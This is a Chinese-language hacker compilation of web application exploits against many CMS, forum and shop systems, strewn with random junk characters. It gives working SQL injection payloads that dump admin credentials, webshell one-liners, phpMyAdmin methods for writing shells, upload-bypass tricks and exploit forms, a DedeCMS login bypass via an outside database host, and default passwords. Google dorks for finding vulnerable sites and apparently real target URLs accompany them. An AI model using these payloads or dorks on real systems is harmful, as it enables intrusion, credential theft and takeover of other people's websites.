启航企业建站系统 cookie注入漏洞通杀所有版本0 w1 T" H5 b' e8 a$ j( x
# ?) @0 q# w4 e" z0 h$ g2 j
直接上exploit:
( K: Q: ? J0 A4 W: ~! D( hjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
' @! y8 D; v& b0 B5 @; e9 F0 Utest:http://www.tb11.net/system/xitong/shownews.asp?id=210
" \' L/ C7 i/ o' v$ O1 v--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) J& d# {6 v5 H# e
Asprain论坛 注册用户 上传图片就可拿到webshell
6 g* {( s* M3 u/ O5 C( P8 j2 _; r$ M* W/ Z$ }
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。 H- }, g/ x. Y4 K8 N4 c5 o2 L
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>9 G* f/ X4 x2 L; @4 v5 h
2.gif 为一小图片文件,一定要小,比如qq表情图片
% L9 o# U i7 G6 s; f3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用: i! u0 B' b% U
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了2 W5 p+ t8 n4 ]) u
5.q.asp;.gif
; U6 e% @1 E; zgoogle:Powered by Asprain
; u* M+ T7 C+ j% f, p$ m--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# J( L. G+ h: i, E2 X
( t4 p5 q9 O- c8 r: C1 W6 jShopNum1全部系统存在上传漏洞。& K7 n# J* Q2 F
. f8 a# i$ p6 y% ~* i首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
+ F! d) {7 r: J按说明 提示登录后台。。6 ?' \4 i# V% J5 ?# i: I7 S1 j
在后台功能页面->附件管理->附件列表# b5 O+ _: u; ]/ E( L( p1 m
可以直接上传.aspx 后缀木马
. y( J1 G) K9 m5 I( I; shttp://demo.shopnum1.com/upload/20110720083822500.aspx' v% O! Z5 w# Z* l8 W$ ~" t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# w% n1 D. z+ n2 o: Y5 ?" h b: u
2 J; \9 s5 b3 l' z牛牛CMS中小企业网站管理系统 上传漏洞
3 V! e. V1 u& M* ]& f# [! {- M) H v, j& a4 V
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
+ L9 a/ B2 T4 v9 I后台:admin/login.asp
' v0 Z/ Z" C/ J6 l+ u W2 k8 Y, V- Oewebeditor 5.5 Nday
' A) m7 k4 ~1 M, S% Rexp:
: N1 z0 \/ Q& S( D( `<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?% G+ G& i- f- t( d0 H2 O9 Y8 j
<input?type=file?name=uploadfile?size=100><br><br>?6 y7 T% b! |: r: J$ x( W5 [0 C
<input?type=submit?value=upload>?& t8 `3 @+ t) j) U
</form>
! E, w$ H3 w5 N+ cps:先上传小马.
8 f1 P. o6 W6 y% f0 Tinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
1 o, C R, m* n9 f" b- E( p# B, `3 [% |, s- [ t
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( ^! Q) f5 Y( z2 s1 s* D* ]
/ W0 ^6 @0 |3 E' IYothCMS 遍历目录漏洞( P; v* _+ m8 b0 S! J2 e# z
5 @+ W/ `* y1 b& s0 {' b% K优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
& G9 V2 h) } S! T( X) m默认后台:admin/login.asp
& P7 X U1 Y- C; F. ?9 w) ^遍历目录:
1 S/ l& b. R0 v% e* o' cewebeditor/manage/upload.asp?id=1&dir=../
' o6 q9 p6 W! k+ l/ R) Ldata:
' Y! ?2 M% S0 d3 l2 ehttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa. p$ E( Q- G) l, ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% W! B7 o( S2 @+ h5 i0 q# r3 e6 e" A& E
2 n$ \: c/ R4 T6 P! |4 u# RNet112企业建站系统 1.05 ^# f* x3 H7 {3 _
% ^3 H" L, M. V+ W+ Z
源码简介:
# x4 O' N+ V. I3 S9 O8 {Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
t5 w* J* k4 n添加管理员:) ]1 `( h& P$ Q1 X& n* W
http://www.0855.tv/admin/admin.asp?action=add&level=2
+ K4 t6 y' J% Q& j2 Z$ q其实加不加都不是很重要,后台文件都没怎么作验证。- v# I- S/ m! {* G2 _
上传路径:8 o: B: R) q! i1 L- K( L
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200. o, Z8 F& u( r4 p
http://www.0855.tv/inc/Upfile.asp?Stype=2! {4 F) q& e7 u6 k
怎么利用自己研究。
4 t: Y9 [% X7 }- z, z) y1 A$ o# D遍历目录:
% j! A" n2 _8 `1 _$ w" Khttp://www.0855.tv/admin/upfile.asp?path=../..( P" i# `1 Z! w8 a- ~1 p4 I
如:
* z" T0 a( @0 Mhttp://www.0855.tv/admin/upfile.asp?path=../admin
0 y& L: f1 u# y" G$ uhttp://www.0855.tv/admin/upfile.asp?path=../data
8 A, A& [* r9 T" O3 k3 ]--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 D8 e n2 a! m/ D. _9 ^3 {6 s1 d" a5 V3 a
易和阳光购物商城通杀 上传漏洞/ J4 g+ ?% {! y f. T
8 q \3 q/ l2 ]3 H! K
前提要求是IIS6.0+asp坏境。! ~, P# ^" Q0 q2 U- K# G5 m# N
漏洞文件Iheeo_upfile.asp % T4 [; }% T0 }4 V9 c3 b8 i0 B8 f
过滤不严.直接可以iis6.0上传& y' {4 I G( `0 V3 r/ |7 L
把ASP木马改成0855.asp;1.gif
, w; z$ j T5 U9 [! |直接放到明小子上传
" b% Z! q1 J+ q0 K9 c' SGoogle搜索:inurl:product.asp?Iheeoid=; m7 M9 Z+ }% C* s% z( {/ F
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 m' B6 Z6 p, E( f
: t$ q: I9 Q/ O# q3 O& `
phpmyadmin后台4种拿shell方法7 R% ~8 H* I8 d) K- `1 C1 g9 l$ I
* Z; h3 J- r' I- x: \9 i7 B方法一:1 J, }6 X3 F/ f/ b
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );/ G0 s* i: w3 v7 X% L" F) D
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');, B; `4 N/ _' D- B* _
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';7 h8 v7 O+ ]& k% v7 p7 R: A
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
& K" N4 A8 s) C! m3 R$ X( w+ B6 a; Q一句话连接密码:xiaoma# `1 ^# I# e/ r- F! f; w2 j: ]7 V# v
方法二:) C, j' [+ x0 O; [# o
Create TABLE xiaoma (xiaoma1 text NOT NULL);
# n W' R2 B, O& dInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');. a' ?! a c' i j& L1 ^
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
+ r. g8 ^* w. w1 \% PDrop TABLE IF EXISTS xiaoma;* o5 b# C0 b! I# i1 \& D+ h( c8 d
方法三:
; [; {+ Y9 r9 A( w: g! y2 T. \7 j读取文件内容: select load_file('E:/xamp/www/s.php');
0 Q: A4 t, X: B, ], y3 ?; {写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'! T$ D8 ~& e% X1 [7 B7 }
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'" i" q. L/ t1 u. W# n
方法四:
2 e5 H* h. Q. k' mselect load_file('E:/xamp/www/xiaoma.php');
7 i, c1 z$ d1 C8 |8 P/ A* jselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
3 m5 a" g7 Z, Y2 I5 x6 x然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
7 j" K9 A7 Y2 s2 y) ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* R: G4 K9 D i- C d: C7 L4 T
2 v9 N3 h7 Y9 J8 p
传信网络独立开发网站源码0day漏洞
6 E9 N: {: l: q0 C1 J1 P, I, I( V- w$ \
后台system/login.asp z/ |. J7 f. H1 c9 @8 l% T5 l0 v, _3 f
进了后台有个ewebeditor! I6 d! l/ O% m
Google 搜索inurl:product1.asp?tyc=( `7 t1 H9 q7 o
编辑器漏洞默认后台ubbcode/admin_login.asp
) p8 j! |2 c7 Y1 H/ ?. b数据库ubbcode/db/ewebeditor.mdb
3 C8 C, r- M5 ^: q9 Z2 j7 f; u默认账号密码yzm 1111119 v0 a/ v# U! Y( u. \" |
7 c# |: Z( k! Q. i拿webshell方法) E' x4 n- p" R, H0 P, z; j* s
登陆后台点击“样式管理”-选择新增样式 ) R. i% k0 U I# O
样式名称:scriptkiddies 随便写
+ p8 C. P4 W( F0 Z: }' Z0 h, G3 Z路径模式:选择绝对路径
2 e! A8 _* q8 ]图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx G4 w8 ^6 W+ }( A2 v$ S
图片类型比如就是我们要上传的ASP木马格式
+ v+ @: |, ^5 T4 d/ ^上传路径:/4 _- Y; K# {- `3 D% y: Z
图片限制:写上1000 免的上不了我们的asp木马' X( B: [' A% {0 |. q
上传内容不要写& @- V6 d: K1 I# Q* }1 x
可以提交了 % Y- k5 B+ {; t4 {- @
样式增加成功! + ]3 c$ r; W$ `! j& q9 c- @' a* c
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 5 A3 c) R$ E" X$ d2 c/ ?0 m+ S0 ]
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
4 ?" A5 P7 X6 M3 R网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
3 w' Q7 b% Y) m9 a* k% L上ASP木马 回车 等到路径
" o8 Q2 [* C+ O( L' G
8 ~" l k' L3 i0 T6 w9 {3 v: y ~( A后台:system/login.asp
3 Y9 m( ^% G; U! O' j. qExp:+ c; W/ C, j4 E/ U! Q) ?8 u
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master% |! F4 Q; T% N% k8 p; P
测试:
( |6 e! Q! z& ]; H1 w! t8 shttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master; a9 W; h3 }0 W K7 m6 d2 Z1 ^
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master- K" S _8 z3 a6 O& G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 [ O, y Z2 p. T
+ t, O' E1 u. {4 i0 B( i& @foosun 0day 最新注入漏洞& Z ^3 C4 G2 t. a6 `/ z
' f* @" n9 ]% D {% S. T$ _
漏洞文件:www.xxx.com/user/SetNextOptions.asp
; Z; F& p8 P% {+ C1 `; Z. w利用简单的方法:. R& ^; L: @/ _# \2 W
暴管理员帐号:
. E, q( c) i. p: uhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
2 c( J ?2 r& j( e1 U9 a4 x2 D0 d暴管理员密码:
7 P4 B8 \4 F! c# c" y. `2 Hhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
! c' G( m9 h4 z6 @) c5 e; b--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' Y4 {8 F# x8 V2 L& f1 q$ V# X& F/ y" R/ q/ z% s
网站程序的版权未知!2 T/ w* n y& N1 E
6 U2 u! W7 r, r2 V/ L: f! G默认网站数据库:
. e9 |9 }/ a! Q- l8 h$ a; qwww.i0day.com/data/nxnews.mdb
9 }6 s4 A% K% kewebeditor 在线编辑器:1 R/ p$ k/ e8 e; _$ M7 b
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
+ o N5 N- P0 {2 y' i# {- n% {5 z登录地址:ewebeditor/admin_login.asp7 N9 w, ~# q* K ^
默认密码:admin admin
/ A1 B# V- I- n! Y& I/ G登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data- f, x2 U3 z! x% I L
& ?2 D3 @ _* z6 v4 b+ l( wSql注入漏洞:
+ N7 U& ~" m7 j4 Ahttp://www.i0day.com/detail.asp?id=12
+ b/ ]" A1 {! m qexp:
, m& P+ o4 k+ @/ Gunion select 1,admin,password,4,5,6,7,8 from admin' b# [1 p3 C5 s$ T, X2 i
爆出明文帐号/密码3 v8 u3 A% S9 p
3 x$ O% s: A1 D/ q9 o' w
上传漏洞:& X) ]7 F# X4 x, [+ G7 Q- ~
后台+upfile.asp
5 U2 G1 d& @4 P- n. J# x如:
4 j5 A) L1 m2 `) J2 x _0 O/ Dhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。2 ]! J. \/ E J% _* c
shell的地址:网址+后台+成功上传的马8 J7 D. I" S: T7 t
google:inurl:news.asp?lanmuName=
/ g% U! T1 }& M3 ]: F------------------------------------------------------------------------------------------------------------------------------------------------------------------------. A% D* Q% b& I. d1 Y5 \% N& H
- A3 U8 {" z7 ]. fdedecms最新0day利用不进后台直接拿WEBSHELL6 I% v+ p; G( c5 N% G
* H5 a) c% c- e4 J2 p4 D拿webshell的方法如下:
% V! Z) o* {" G# S% [( B9 S网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
$ n5 w3 @% W2 j9 s1 S前题条件,必须准备好自己的dede数据库,然后插入数据:
) q+ Z; A$ h0 F0 |0 t. U: D/ D3 kinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); ! k/ K+ {6 o0 z0 S# S
, t. c: [" c5 w* |6 V再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
0 R( h2 r, j1 Z) B" j- H7 Z1 s9 R<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
) y$ u( C2 t9 a. ]6 b2 }& t<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
' U8 Y9 F. d9 V! \$ U1 [<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />) T) [) B! A" Z: {5 c% |
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />" p3 y9 d; U/ W4 m6 ~7 ~1 N) h
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
% N. T0 \: _* ] e; @8 _<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />4 R% J, ]$ c% p! Z* B {
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
I- ~/ ~, C) F1 Q<input type="text" value="true" name="nocache" style="width:400">
( X+ A3 {3 |. U<input type="submit" value="提交" name="QuickSearchBtn"><br />" R9 Y+ K( s( r- \8 h$ |3 I) V' e
</form>
# D8 i2 A9 A, i: W+ C; n2 p- f7 I/ U* g" v<script>
* ^' \& C/ R7 z1 {function addaction()* K- ~9 o' q9 Z9 C# V
{& j( s1 I1 `8 z
document.QuickSearch.action=document.QuickSearch.doaction.value;6 U! t$ a X5 K3 R/ t
}$ y9 ^+ _7 W+ u& x' i, O1 e& K
</script>. W8 S/ Y7 V' N1 e
----------------------------------------------------------------------------------------------------------------------------------------------- V9 K0 R$ v3 W, a% _) R, U
4 t, X" O6 v6 Q5 u& l3 p1 ^8 gdedecms织梦暴最新严重0day漏洞, p, f5 V' C, b7 ?4 m
bug被利用步骤如下:7 f5 P# y9 q2 e; r, w4 ~
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
& }) z2 G" D H! ^- ]把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
% _5 E% A. X; l5 }1 j j3 S I' b-------------------------------------------------------------------------------------------------------------------------------------------
( H p- B7 K$ ?; g( d
2 z5 |1 P p0 g0 E" N3 P; c( D7 M4 A& d2 T多多淘宝客程序上传漏洞
& u3 ?& Q9 a( p漏洞页面:
; ^6 f7 ~. L+ Y4 ?, Q! M+ Oadmin\upload_pic.php
0 w1 K6 G$ T" ~6 ?3 U" Z, M传送门:5 x+ w8 Q0 D; l8 p3 Y3 _
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
( [/ \& ~: o3 Z! M& g, [PS:copy张图片马 直接 xxx.php 上传抓包地址!
6 W+ u) f; G3 U' M. D------------------------------------------------------------------------------------------------------------------------------------------------------* _( f1 v5 c9 u9 Y0 ]6 Q
3 f- \' T: p- V' s- T
无忧公司系统ASP专业版后台上传漏洞3 \( { } ^! O4 k# l5 V/ s9 ]
漏洞文件 后台上传 {8 u& o# W4 {6 n
admin/uploadPic.asp
' M0 J: }9 @: X E0 x漏洞利用 这个漏洞好像是雷池的
& b1 B. K+ t0 qhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
% _3 y8 G$ i4 o$ E2 D, g等到的webshell路径:% ]" F& w* I0 y
/UploadFiles/scriptkiddies.asp;_2.gif+ Y0 S* @& h; s- t
---------------------------------------------------------------------------------------------------------------------------------------------------
, R0 a# a5 x& d, d
& I- Y0 H* J' ~0 E c+ ^4 ^住哪酒店分销联盟系统2010+ H5 U% S2 T( G2 W0 F
Search:
: `- Q z# T. D. n+ Sinurl:index.php?m=hotelinfo
1 [- w3 t, S% D0 [# e2 Z% u; e1 Bhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
! C* e1 K# p# `5 Q' k d8 d) H默认后台:index.php?m=admin/login
! Q8 q& a: V/ }" v--------------------------------------------------------------------------------------------------------------------------------------------------
, c/ a# W- \& g/ f4 N
O. k, x* U# ~' ^$ _. einurl:info_Print.asp?ArticleID=8 j$ G0 b8 j" e# O% {% s. m
后台 ad_login.asp* O% y4 A1 y* m/ }
爆管理员密码:1 _7 q6 k" J* R, Q
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin4 s- T6 h; I- x' P8 E
------------------------------------------------------------------------------------------------------------------------------------------------------------1 E% ~6 M1 U; V9 q* z4 E
3 @: T8 N7 D! a' k搜索框漏洞!9 K7 ^+ r# _' E' v. w
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
$ {$ k6 w7 i& A f" C2 }1 a$ f8 Z--------------------------------------------------------------------------------------------------------------------------------------------------------
L2 e2 y M* j. E# c( y5 _$ r5 E
关键字:' a' @0 t t) m& {
inurl:/reg_TemletSel.asp?step=2& l R& h. v; l) \7 I+ W# C# r
或者( [+ L1 }( C* v
电子商务自助建站--您理想的助手5 A6 E" f. N+ Z ?4 n0 D
-------------------------------------------------------------------------------------------------------------------------------------------------
+ J- |) `; c4 V; q
# y& j( a+ }( U4 x. J9 siGiveTest 2.1.0注入漏洞- M& L. `$ A$ t4 U0 h0 J
Version: <= 2.1.0
: i0 i% i) E4 G O, U d# Homepage: http://iGiveTest.com/
8 y' j" Y( ^! O4 ~! ?- y谷歌关键字: “Powered by iGiveTest”8 f: a" C8 L, C# A+ H4 s
随便注册一个帐号。然后暴管理员帐号和密码8 H$ L) O3 t- T, \, w6 Q% [
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1+ B# D" O/ y& k+ H7 T7 `' J: \8 T
------------------------------------------------------------------------------------------------------------------------------------------------* l8 `0 q' d0 i3 y0 ?# g
% j/ P7 W `+ }/ }CKXP网上书店注入漏洞
. h" z1 F0 b& V3 S工具加表:shop_admin 加字段:admin y+ c" C* U( @' s. B
后台:admin/login.asp
5 I0 h3 L6 T6 Y7 O! E( `* d! t登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/2 n5 S+ R o* s' O" P9 M( L5 W" K2 ?
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息. b/ v V9 |) D
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 `8 j; Y2 \" v8 c7 O8 H, C) j* k0 { @" M6 @( G6 G( T4 a
段富超个人网站系统留言本写马漏洞
+ H/ f0 _. p# o9 L- C. P$ z源码下载:http://www.mycodes.net/24/2149.htm; E: u: x0 |/ e& j/ j
addgbook.asp 提交一句话。
G) p. n! |' K! t% g! @连接: http://www.xxxx.tv/date/date3f.asp
0 o" m) }1 G7 l* ~2 r2 fgoogle:为防批量,特略!
/ Z" F$ r( [& Q7 T+ q+ P, V-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. H1 h& D' D+ e" n
3 C; X# ~7 d3 z$ `$ P0 n2 q智有道专业旅游系统v1.0 注入及列目录漏洞
4 ^) \4 v6 X' r* C) Q" c默认后台路径:/admin/login.asp' [, N7 K* K$ ]1 [9 s2 u
默认管理员:admin
1 Y6 S' s0 x, T8 p0 Q3 N* _默认密码:1234563 T! E- l: {9 V2 I0 a
SQL EXP Tset:% d! T- x" [- T* {3 y
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin, s6 q# N3 C' C: M
------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 X# R. E. m" e! q/ F2 [9 S
* g: ]1 K1 C4 G/ G
ewebeditor(PHP) Ver 3.8 本任意文件上传0day. ]2 ]* E! e. x' t) f' L8 f6 b
EXP:9 ]* w" z$ L: W2 B
<title>eWebeditoR3.8 for php任意文件上EXP</title>3 _) }6 G8 x- Q& r0 O' x t; i
<form action="" method=post enctype="multip/ s/ Q' G, d. w8 x
art/form-data">
# b2 H# x- W6 B7 V, a9 C<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
# s$ v9 K/ g* Y* [8 }. R' UURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
) F. r2 O+ ~( ~$ D4 s# R<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> W* D5 @6 K: \8 I; R! v
file:<input type=file name="uploadfile"><br>
1 U+ t/ |: }, D' O! p o# g! [<input type=button value=submit onclick=fsubmit()> 7 E6 E- Y& Z* P1 x+ B1 v
</form><br>
. w8 ]2 Z$ w1 ]9 {0 ?# E, z1 r<script> % U6 B+ i1 S3 D( S, P( \% Q$ q
function fsubmit(){ $ n0 {7 x. _4 O2 z
form = document.forms[0]; ; H, a, I: E9 F+ s: f0 Q! t) F3 v
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; / D4 n P. i1 N G- Z# R( _
alert(form.action);
' S) }# j) e3 p, `$ @' Uform.submit();
; }9 _6 i$ ^! x/ t' q; L}
# D& q6 d7 P9 O& F</script>- } _5 X3 J- N* V Q5 Z3 t
注意修改里面ewebeditor的名称还有路径。
5 C/ f+ b7 ^3 Z/ P---------------------------------------------------------------------------------------------------------------------------------------------------------------------------# X9 z) \/ |3 ]5 H3 d
. @+ W- R) ]( S4 K R* M提交’时提示ip被记录 防注入系统的利用
& D* X Z4 [4 k Q* I$ S4 n# O- }网址:http://www.xxx.com/newslist.asp?id=122′2 J$ d3 I9 k& S3 L* P8 H. [
提示“你的操作已被记录!”等信息。3 d* X: h1 Z4 X* i3 f
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
) l& q; c7 l( P-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 g. M8 [5 C: m5 x. \- w; q- ^
0 a+ P0 r9 Z( ]) e! I$ H; H1 u8 E西部商务网站管理系统 批量拿shell-0day
9 W1 f! u/ b. W( b% ?$ r' T这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 3 I' ]7 ^9 Y; \( G ^* s2 m
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛8 |0 d# T) X H5 R
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合9 V, G" X" C1 J; Y( F
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
$ W7 m, F1 i, b, J, l5 |---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ U, [8 \# X$ m; x8 I. z
" e/ C4 Y1 y# c: ?JspRun!6.0 论坛管理后台注入漏洞+ U0 N6 @' p7 e7 F" a0 {& X) I
) N" q& I+ ~( t
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
/ ~+ U1 L% @- w7 L! dJspRun!6.0 7 f) C, t; E9 G( r- u7 S6 G
漏洞描述:( c2 g/ b5 c/ P+ C" E r- `
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。7 L% q" v) ?: t$ M/ {
在处理后台提交的文件中ForumManageAction.java第1940行8 M: F) `" z# j8 O* |5 x- k
String export = request.getParameter("export");//直接获取,没有安全过滤
6 P5 H& g e3 l4 r# D& e/ C% uif(export!=null){; F2 v# C- g- o& z. D) W
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了... D& `% c2 S' z2 ]5 t0 x4 u. D4 l
if(styles==null||styles.size()==0){
6 P! |2 J2 z8 v5 _9 `/ k<*参考" Q8 u8 \0 J- |' [- d& X+ Y
nuanfan@gmail.com* M/ S* P: W) C1 M- |; T. J% ]
*> SEBUG安全建议:
. l8 Q0 Q3 L2 v9 \( z iwww.jsprun.net4 [+ Q! m M% u
(1)安全过滤变量export
# f7 E$ \6 Q: A3 U(2)在查询语句中使用占位符0 J1 k0 x s% r- v' P \+ v8 y
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------% b r* d/ o/ B
* H! e4 L$ J$ ^" X: Y+ |
乌邦图企业网站系统 cookies 注入
~! e- b& K2 v; k; t5 p9 j
; s# a$ k- s1 K2 G程序完整登陆后台:/admin/login.asp
* M1 X; L# M5 w默认登陆帐号:admin 密码:admin8889 w4 r/ d& S6 z/ G k9 B
语句:(前面加个空格)
7 L9 M: ]. P, K0 E$ q q6 U$ band 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin V* F; t: Z4 T
或者是16个字段:, A P+ a5 U: \( X/ a$ x3 |
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
+ {* @- t% f7 k- r爆不出来自己猜字段。
. a- D( Z; m. R9 w0 c注入点:http://www.untnt.com/shownews.asp?=88$ p+ }. ^. T ?1 c* @' w% q
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
! y" ]' b; A- L2 U关键字:
. W% u C! @# {+ _9 N: m! ainurl:shownews?asp.id=
; _! J$ L' Y! {- l& O-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------# F% N6 z1 l: t3 Q) ~9 o
& s C5 A' u1 V0 x/ p& U' o) P
CKXP网上书店注入漏洞! k3 J# u" N# v
6 i- z: g: E; G! W" o0 s1 y
工具加表:shop_admin 加字段:admin n @! T3 p$ R# E6 h0 @" i* j, k& W
后台:admin/login.asp
) B4 c( x9 ^! J; @% \登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/8 t2 Z$ x# x' f& [* g8 [
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息, E9 a, A$ ]+ P% ~3 c
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 T' A& R2 ?& Y! p5 f
% P) F5 @! h! x2 R" M' C
YxShop易想购物商城4.7.1版本任意文件上传漏洞# z6 T- J8 y0 H; t9 A) R' Y
